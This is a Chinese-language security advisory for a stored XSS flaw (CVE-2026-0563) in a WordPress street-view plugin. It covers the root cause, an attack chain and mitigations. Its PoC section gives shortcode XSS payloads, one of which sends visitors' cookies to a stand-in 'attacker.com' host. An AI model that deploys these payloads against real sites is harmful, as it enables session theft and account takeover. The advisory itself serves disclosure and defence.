CVE-2026-0563: WordPress WP Google Street View插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-0563

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WP Google Street View (with 360° virtual tour) & Google maps + Local SEO plugin for WordPress

漏洞概述

CVE-2026-0563是WordPress平台上一款名为WP Google Street View的插件存在的安全漏洞。该插件集成了Google街景视图（支持360°虚拟导览）和Google地图功能，同时提供本地SEO优化服务。由于插件在处理wpgsv_map短代码时，对用户输入的过滤和转义处理不充分，导致恶意脚本可以被永久存储在服务器端。任何访问包含该恶意短代码页面的用户都会自动执行攻击者注入的JavaScript代码。此漏洞需要攻击者具备至少Contributor级别的WordPress账户权限，这意味着在多用户博客或协作写作环境中，恶意用户可以利用此漏洞对其他用户和管理员发起攻击。攻击成功后，攻击者可以窃取会话Cookie、劫持用户账户、修改页面内容或进行进一步的社会工程攻击。由于是存储型XSS，攻击具有持久性，一旦注入成功，即使原始攻击者账户被删除，恶意代码仍会保留在数据库中。

技术细节

该漏洞的根本原因在于插件的shortcode.php文件中，对wpgsv_map短代码参数处理不当。具体表现为：1）输入验证不足：插件未对短代码属性进行严格的类型检查和内容过滤，允许攻击者传入包含恶意JavaScript代码的参数；2）输出转义缺失：当这些参数被回显到HTML页面时，插件没有进行适当的HTML实体编码或输出转义，使得浏览器将其解析为可执行脚本；3）数据持久化：恶意代码被保存到WordPress数据库的post_content字段中，每次页面加载时都会从数据库读取并执行。攻击者只需在文章或页面中插入类似[wpgsv_map some_attr="xss payload"]的短代码，即可完成注入。CVSS 3.1评分6.4（AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N）表明攻击复杂度低、权限要求低，但影响范围限于受感染页面本身。修复版本为1.1.9，建议用户立即升级。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用的WordPress版本和WP Google Street View插件版本（<=1.1.8）

STEP 2

2

账户获取：攻击者通过注册或社会工程手段获取WordPress Contributor级别或更高权限的账户

STEP 3

3

漏洞探测：攻击者使用短代码[wpgsv_map]构造恶意XSS payload，测试是否存在过滤机制

STEP 4

4

恶意注入：攻击者在文章/页面编辑器中插入包含XSS payload的短代码并保存

STEP 5

5

数据持久化：恶意代码被存储到WordPress数据库的posts表中，实现持久化攻击

STEP 6

6

触发执行：受害者访问包含恶意短代码的页面，浏览器解析并执行注入的JavaScript代码

STEP 7

7

攻击完成：攻击者通过XSS获取受害者Cookie、劫持会话、修改内容或进行进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-0563 PoC: Stored XSS via wpgsv_map shortcode -->
<!-- Requires Contributor+ role in WordPress -->

<!-- Method 1: Via WordPress post/page editor -->
[wpgsv_map lat='" onerror="alert(String.fromCharCode(88,83,83,80,111,67))" data-x="']

<!-- Method 2: More complex payload -->
[wpgsv_map lng='"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>']

<!-- Method 3: Event handler based XSS -->
[wpgsv_map zoom='1' onmouseover='alert(document.domain)']

<!-- PoC Explanation: -->
<!-- 1. Attacker with Contributor role creates/edits a post -->
<!-- 2. Inserts malicious shortcode with XSS payload -->
<!-- 3. Submits post for review or publishes directly (if permitted) -->
<!-- 4. When any user views the page, XSS payload executes -->
<!-- 5. Attacker can steal session cookies, perform actions as victim -->

影响范围

WP Google Street View plugin <= 1.1.8

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时措施：1）在WordPress配置文件中禁用未授权用户的文章发布功能，要求所有新文章需管理员审核；2）通过.htaccess或Nginx配置限制对包含可疑短代码的请求；3）临时禁用wpgsv_map短代码功能，在functions.php中添加remove_shortcode('wpgsv_map')；4）加强用户权限管理，禁用新用户注册或设置强密码策略；5）部署Web应用防火墙规则拦截包含<script>、onerror、onload等XSS特征的请求。